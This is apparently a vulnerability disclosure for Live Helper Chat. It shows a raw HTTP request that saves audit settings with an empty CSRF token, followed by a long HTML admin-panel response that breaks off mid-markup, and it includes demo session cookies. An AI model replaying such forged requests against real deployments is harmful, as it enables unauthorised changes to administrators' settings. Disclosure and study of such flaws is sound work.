Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Jan 13th 2022


Description

A CSRF issue is found in the audit configuration under settings. It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed.

Proof of Concept

Request

POST /site_admin/audit/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/audit/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=nq51ir4qicpnju1bdmqjitcuaj
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&days_log=90&log_js=on&StoreOptions=Save

In the above request, you can see that I have removed the CSRf token, and then also the server accepts this request and performs the desired action.

Successful Response


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 10:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Cache-Control: nocache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 02 Jan 1990 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 47652

<!DOCTYPE html><html  lang="en" dir="" ng-app="lhcApp"><head><title ng-non-bindable>Options &laquo; System configuration &laquo; Live Helper Chat - live support</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="icon" type="image/png" href="/design/defaulttheme/images/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/design/defaulttheme/images/favicon.ico"><meta name="Keywords" content="" /><meta name="Description" content="" /><meta name="robots" content="noindex, nofollow"><meta name="copyright" content="Remigijus Kiminas, livehelperchat.com"><link rel="stylesheet" type="text/css" href="/design/defaulttheme/css/css_static/a6692c332b973bd8c9a6ef0bd106e855.css?1641801574" /><script type="text/javascript">var WWW_DIR_JAVASCRIPT = '/site_admin/';var WWW_DIR_JAVASCRIPT_FILES = '/design/defaulttheme/sound';var WWW_DIR_LHC_WEBPACK = '/design/defaulttheme/js/lh/dist/';var WWW_DIR_LHC_WEBPACK_ADMIN = '/design/defaulttheme/js/admin/dist/';var WWW_DIR_JAVASCRIPT_FILES_NOTIFICATION = '/design/defaulttheme/images/notification';var confLH = {};confLH.back_office_sinterval = 10000;confLH.chat_message_sinterval = 3500;confLH.transLation = {"sending":"Sending...","delete_confirm":"Are you sure you want to delete this chat?","new_chat":"New chat request","transfered":"New chat has been transferred to you directly!","edit":"Edit","quote":"Quote","copy":"Copy","copy_group":"Copy all","ask_help":"Ask for help","translate":"Translate","new":"New"};confLH.new_message_sound_user_enabled = 1;confLH.csrf_token = 'ddd6453b3a4966fd49c28edd5975617b';confLH.user_id = '1';confLH.show_alert_transfer = 1;confLH.show_alert = 0;confLH.auto_join_private = 1;confLH.new_message_sound_admin_enabled = 1;confLH.new_message_browser_notification = 0;confLH.new_chat_sound_enabled = 1;confLH.sn_off = 1;confLH.ownntfonly = 0;confLH.accept_chats = 0;confLH.auto_uppercase = 1;confLH.new_dashboard = false;confLH.hide_tabs = 1;confLH.no_scroll_bottom = 0;confLH.scroll_load = 1;confLH.repeat_sound = 1;confLH.repeat_sound_delay = 5;confLH.content_language = 'en';confLH.defaultm_hegiht = '200';confLH.dlist = {'op_n':'10'};confLH.lngUser = 'en';confLH.gmaps_api_key = "";</script><script src="/design/defaulttheme/js/js_static/2961a882a73f1d6f1a235887b4ea364a.js?1641801574"></script></head><body id="admin-body" class="pr-0 " ng-cloak ng-controller="LiveHelperChatCtrl as lhc" ng-init="lhc.getToggleWidget('pending_chats_sort','false');"><nav class="navbar navbar-expand-lg border-bottom p-0 pl-1 top-menu-bar-lhc" translate="no"><a rel="noreferrer" class="navbar-brand back-logo" href="/site_admin/" title="Live Helper Chat"><img class="img-fluid" src="/design/defaulttheme/images/general/logo.png" alt="Live Helper Chat" title="Live Helper Chat"></a><button class="btn border-0 mr-auto btn-outline-secondary" type="button" ng-click="lhc.toggleList('lmtoggle')" title="Expand or collapse left menu" aria-expanded="true" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div ng-cloak class="version-updated float-left" ng-if="lhc.lhcPendingRefresh == true || lhc.lhcConnectivityProblem == true || lhc.inActive == true"><div ng-if="lhc.lhcPendingRefresh == true"><i class="material-icons">update</i>This window will be automatically refreshed in {{lhc.lhcVersionCounter}} seconds due to a version update.</div><div ng-if="lhc.lhcConnectivityProblem == true">You have weak internet connection or the server has problems. Try to refresh the  page. Error code {{lhc.lhcConnectivityProblemExplain}}</div><div ng-if="lhc.inActive == true">You went offline because of inactivity. Please close other chat windows if you have any</div></div><button class="navbar-toggler btn border-0 btn-outline-secondary pb-2" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div class="collapse navbar-collapse" id="navbarNavDropdown"><ul class="navbar-nav ml-auto"><li class="list-inline-item nav-item"><a href="#" class="nav-link"><i id="online-offline-user" class="material-icons ng-cloak" ng-click="lhc.changeOnline()" title="Change my status to online/offline" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i></a></li><li class="nav-item dropleft"><a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Remigijus </a><div class="dropdown-menu" style="min-width: 25rem;" role="menu"><div class="row"><div class="col-6"><div class="pl-2 pt-1 font-weight-bold" ng-non-bindable>Hello&nbsp;Remigijus!</div></div><div class="col-6"><a class="dropdown-item pl-2" href="/site_admin/user/account" title="Account"><i class="material-icons">account_box</i>Account</a></div><div class="col-6"><a title="Toggle between dark and white themes" href="/site_admin/front/switchdashboard/(action)/mode" class="csfr-required dropdown-item pl-2"><span class="material-icons">settings_brightness</span>Dark/bright</a></div><div class="col-6"><a class="dropdown-item pl-2 csfr-required" href="/site_admin/user/logout" title="Logout"><i class="material-icons">exit_to_app</i>Logout</a></div></div><hr class="m-0"><div class="row"><div class="col-12"><a href="/site_admin/user/setsetting/auto_uppercase/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Auto uppercase sentences</a></div><div class="col-12"><a href="/site_admin/user/setsetting/no_scroll_bottom/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Do not scroll to the bottom on chat open</a></div><div class="col-12"><a href="/site_admin/user/setsetting/auto_preload/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Auto preload previous visitor chat messages</a></div><div class="col-12"><a href="/site_admin/user/setsetting/scroll_load/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Load previous message on scroll</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new messages from users"><i class="material-icons" >volume_up</i>New messages</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableNewChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new pending chats"><i class="material-icons" >volume_up</i>New chats</a></div></div><hr class="m-0"><div class="row"><div class="col-6"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeOnline($event)" title="Change my status to online/offline"><i id="online-offline-user" class="material-icons ng-cloak" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i>{{lhc.hideOnline == true ? "Offline" : "Online"}}</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" title="Change my persistent status to online" ng-click="lhc.changeAlwaysOnline($event)"><i class="material-icons ng-cloak"  >{{lhc.hideOnline == true ? 'flash_off' : (lhc.alwaysOnline == true ? 'toggle_on' : 'toggle_off')}}</i>{{lhc.alwaysOnline == true ? "Always online" : "Based on activity"}}</a></div><div class="col-12"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeVisibility($event)"><i id="vi-in-user" class="material-icons ng-cloak" title="Change my visibility to visible/invisible" >{{lhc.hideInvisible == true ? 'visibility_off' : 'visibility'}}</i>{{lhc.hideInvisible == true ? "Invisible" : "Visible"}}</a></div></div><hr class="m-0"></div></li><li class="li-icon nav-item"><a class="nav-link" ng-click="lhc.toggleList('lmtoggler')" title="Expand or collapse right menu"><span class="material-icons">menu</span></a></li></ul></div></nav><div id="wrapper" ng-cloak ng-class="{toggled: lmtoggle, toggledr : lmtoggler}"><div id="sidebar-wrapper" ng-cloak translate="no"><div class="navbar-light sidebar" role="navigation"><div class="sidebar-nav navbar-collapse"><ul class="nav" id="side-menu"><li class="nav-item"><a class="nav-link" href="/site_admin/" onclick="$('#tabs a[href=\'#dashboard\']').tab('show')"><i class="material-icons md-18">home</i>Dashboard</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">chat</i>Chat<i class="material-icons arrow">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="#" onclick="javascript:lhinst.chatTabsOpen()"><i class="material-icons">chat</i>Chat tabs</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/list" ><i class="material-icons">list</i>Chats list</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/views/home" ><i class="material-icons">saved_search</i>My views</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/onlineusers" ><i class="material-icons">face</i>Online visitors</a></li></ul></li><li class="nav-item"><a class="nav-link" href="/site_admin/system/configuration"><i class="material-icons">settings_applications</i>Settings</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">info_outline</i>Modules<i class="material-icons arrow md-18">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="/site_admin/questionary/list"><i class="material-icons">email</i>Questionary</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/faq/list"><i class="material-icons">help</i>FAQ</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chatbox/configuration"><i class="material-icons">comment</i>Chatbox</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/browseoffer/index"><i class="material-icons">open_in_browser</i>Browse offers</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/form/index"><i class="material-icons">attachment</i>Forms</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/fbmessenger/index"><i class="material-icons">comment</i>Facebook chat</a></li></ul></li></ul></div></div></div><div id="page-content-wrapper"><div id="path-container" ng-non-bindable><ul class="breadcrumb rounded-0 border-bottom p-2 mb-0" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">
<li class="breadcrumb-item"><a rel="home" itemprop="url" href="/site_admin/"><span itemprop="title">Home</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="/site_admin/system/configuration" itemprop="url"><span itemprop="title">System configuration</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><span itemprop="title">Options</span></li></ul></div><div class="row"><div id="middle-column-page" class="col-xl-9 pb-1"><h1 class="attr-header">Audit Configuration</h1><form action="" method="post" ng-non-bindable><input type="hidden" name="csfr_token" value="ddd6453b3a4966fd49c28edd5975617b" /><div role="alert" class="alert alert-success alert-dismissible fade show"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>Settings updated</div><div class="form-group"><label>How many days keep log?</label><input type="text" class="form-control" name="days_log" value="90" /></div><div class="form-group"><label><input type="checkbox" name="log_js" checked value="on" /> Log javascript errors</label></div><div class="form-group"><label><input type="checkbox" name="log_block"  value="on" /> Log applied blocks</label></div><div class="form-group"><label><input type="checkbox" name="log_user"  value="on" /> Log users changes</label></div><h5>What objects changes log?</h5><div class="row"><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="AutoResponder">Auto Responder</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="CannedMsg">Canned Message</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Subject">Subject</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Departament">Department</label></div></div><input type="submit" class="btn btn-secondary" name="StoreOptions" value="Save" /></form></div><div class="columns col-xl-3 right-column-page-general" translate="no" id="right-column-page" ng-cloak><div role="tabpanel" ng-show="transfer_dep_chats.list.length > 0 || transfer_chats.list.length > 0"><!-- Nav tabs -->
<ul class="nav nav-pills" role="tablist"><li role="presentation" class="active"><a title="Chats transferred to you directly" href="#transferedperson" aria-controls="transferedperson" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="tru-cnt"></span></a></li><li role="presentation"><a title="Transferred to your department" href="#transfereddep" aria-controls="transfereddep" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="trd-cnt"></span></a></li></ul><!-- Tab panes -->
<div class="tab-content"><div role="tabpanel" class="tab-pane active" id="transferedperson"><div id="right-transfer-chats"><ul class="no-bullet fs12"><li ng-repeat="chat in transfer_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_chats.list.length == 0">Empty...</p></div></div><div role="tabpanel" class="tab-pane" id="transfereddep"><div id="right-transfer-departments"><ul class="no-bullet small-list"><li ng-repeat="chat in transfer_dep_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_dep_chats.list.length == 0">Empty...</p></div></div></div></div><div class="card panel-lhc""><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(user_id)/1"><i class="material-icons chat-active">account_box</i>My active and pending chats ({{my_chats.list.length}}{{my_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('my_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{my_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-my-chats" ng-show="my_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.mcd.length == 0 ? "All departments" : (lhc.mcd.length == 1 && true ? lhc.mcdNames.join(", ") : '['+lhc.mcd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('mcd',true)" type="checkbox" ng-model="lhc.mcd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_products" checklist-change="lhc.productChanged('mcd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_dpgroups" checklist-change="lhc.productChanged('mcd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.mcd_only_explicit_online == true && department.oexp == false) || (lhc.mcd_hide_hidden == true && department.hidden == true) || (lhc.mcd_hide_disabled == true && department.disabled == true) || (lhc.mcd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.mcd" checklist-change="lhc.departmentChanged('mcd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitmc" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="my_chats && my_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Last message" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in my_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event);" class="material-icons">info_outline</a><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.status == 1 ? 'Active' : 'Pending'}}"><i ng-if="chat.status != 1" title="Pending chat" class="material-icons chat-unread">&#xE80E;</i><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.status == 0 ? '&#x23F3; '+chat.wait_time_pending : chat.last_msg_time_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="!my_chats || my_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/0"><i class="material-icons chat-pending">chat</i>Pending chats ({{pending_chats.list.length}}{{pending_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('pending_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{pending_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-pending-chats" ng-if="pending_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.pendingd.length == 0 ? "All departments" : (lhc.pendingd.length == 1 && true ? lhc.pendingdNames.join(", ") : '['+lhc.pendingd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('pendingd',true)" type="checkbox" ng-model="lhc.pendingd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_products" checklist-change="lhc.productChanged('pendingd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_dpgroups" checklist-change="lhc.productChanged('pendingd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.pendingd_only_explicit_online == true && department.oexp == false) || (lhc.pendingd_hide_hidden == true && department.hidden == true) || (lhc.pendingd_hide_disabled == true && department.disabled == true) || (lhc.pendingd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.pendingd" checklist-change="lhc.departmentChanged('pendingd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingu" checklist-change="lhc.productChanged('pendingu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_ugroups" checklist-change="lhc.productChanged('pendingd_ugroups')" checklist-value="userGroup.id"><i title="User group" class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitp" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="pending_chats.list.length > 0"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i><a ng-click="lhc.toggleWidget('pending_chats_sort',true)"><i title="Sort" class="material-icons">{{lhc.toggleWidgetData['pending_chats_sort'] == false ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><i title="Wait time" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in pending_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list" ><a title="Delete chat" class="material-icons float-right" ng-click="lhc.deleteChat(chat.id);$event.stopPropagation()">delete</a><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-show="chat.can_edit_chat" class="material-icons" title="Redirect user to contact form." ng-click="lhc.redirectContact(chat.id,'Are you sure?',$event)">reply</a><a ng-click="lhc.previewChat(chat.id,$event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}<small>{{chat.plain_user_name !== undefined ? ' | ' + chat.plain_user_name : ''}}</small></div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.wait_time_pending}}">{{chat.wait_time_pending}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="pending_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/1"><i class="material-icons chat-active">chat</i>Active chats ({{active_chats.list.length}}{{active_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('active_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{active_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-active-chats" ng-show="active_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.actived.length == 0 ? "All departments" : (lhc.actived.length == 1 && true ? lhc.activedNames.join(", ") : '['+lhc.actived.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('actived',true)" type="checkbox" ng-model="lhc.actived_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_products" checklist-change="lhc.productChanged('actived_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_dpgroups" checklist-change="lhc.productChanged('actived_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.actived_only_explicit_online == true && department.oexp == false) || (lhc.actived_hide_hidden == true && department.hidden == true) || (lhc.actived_hide_disabled == true && department.disabled == true) || (lhc.actived_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.actived" checklist-change="lhc.departmentChanged('actived')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" 